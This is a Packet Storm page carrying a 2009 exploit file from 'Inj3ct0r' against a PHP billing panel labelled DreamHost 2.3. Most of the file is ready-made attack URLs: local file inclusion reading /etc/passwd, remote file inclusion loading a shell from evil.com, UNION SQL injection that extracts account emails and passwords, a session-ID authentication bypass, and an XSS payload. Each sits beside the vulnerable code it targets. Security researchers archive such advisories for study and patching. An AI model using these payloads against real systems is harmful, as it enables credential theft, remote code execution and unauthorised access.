exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DreamHost 2.3 SQL Injection / RFI / LFI / XSS

DreamHost 2.3 SQL Injection / RFI / LFI / XSS
Posted Aug 28, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

DreamHost versions 2.3 and below suffer from remote SQL injection, remote file inclusion, local file inclusion, and cross site scripting vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, xss, sql injection, file inclusion
SHA-256 | 63b5564c74ab83334a7ccb85839493eb9482fe5028407714c3457fd47b5cc7de
Download | Favorite | View

DreamHost 2.3 SQL Injection / RFI / LFI / XSS

Change Mirror Download
=================================================
DreamHost <= && > 2.3 global inj3ct0r.com Exploit
=================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net

Decided to make a review to DreamHost - Billing Panel
Site product: dreamcost.com
Version: <= && > 2.3

----------------------------------------------------------------

Local Include Exploit:

/members.php?page=/../../../../../../../../../../etc/passwd%00


Vulnerable code:

 // member_template.html 
<? 
include("member_$page.html");  
?> 

-----------------------------------------------------------------

Remote Include Exploit:

/admin/?page=http://evil.com/shell.php?

Vulnerable code:

 // /admin/template.html 
include("$page$page_ext"); 

------------------------------------------------------------------

Sql Inj3ct0r Exploit:


members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=you session_id

and

members.php?page=orders_view&order_id=-1'+UNION+SELECT+concat_ws(0x3,account_email,accoun t_password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28+FROM+account+WH ERE+account_id=1%20--%20&session_id=-1'+OR+login_logged=0x59%20--%20

Vulnerable code:

 // member_orders_view.html 
$db = new ps_DB; 
    $q  = "SELECT * FROM orders WHERE order_id='$order_id' AND order_account_id='$account_id' ORDER BY order_id"; 

-------------------------------------------------------------

Admin Login: members.php?Page=static&content=login
Admin Password: members.php?Page=static&content=password
Path: members.php?Page=static&content=path

Vulnerable code:

 // member_static.thml 
 <?  echo setup($content);?> 

// functions.php 
function setup($field) { 
        $db = new ps_DB; 
        $q = "SELECT setup_$field FROM setup WHERE setup_id='1'"; 
        $db->query($q); 
        $db->next_record(); 
         
        $ret = $db->f("setup_$field"); 
      return $ret; 
} 
    $db->query($q); 

-------------------------------------------------------------

SQL-Inj3ct0r entry under randomly Account

members.php?page=account&session_id=-1'+OR+login_logged=0x59%20-%20

Vulnerable code:


// member_account.html 
$pass = is_logged($session_id); 

// functions.php 
function is_logged($session_id) { 
        $db = new ps_DB; 
        $q = "SELECT * FROM login WHERE login_id = '$session_id'"; 
        $db->query($q); 
        $db->next_record(); 
        $ret = $db->f("login_logged"); 
return $ret; 
} 

--------------------------------------------------------------

Xss Exploit:

/members.php?page=static&content=<script>alert('inj3ct0r.com')</script>


---------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close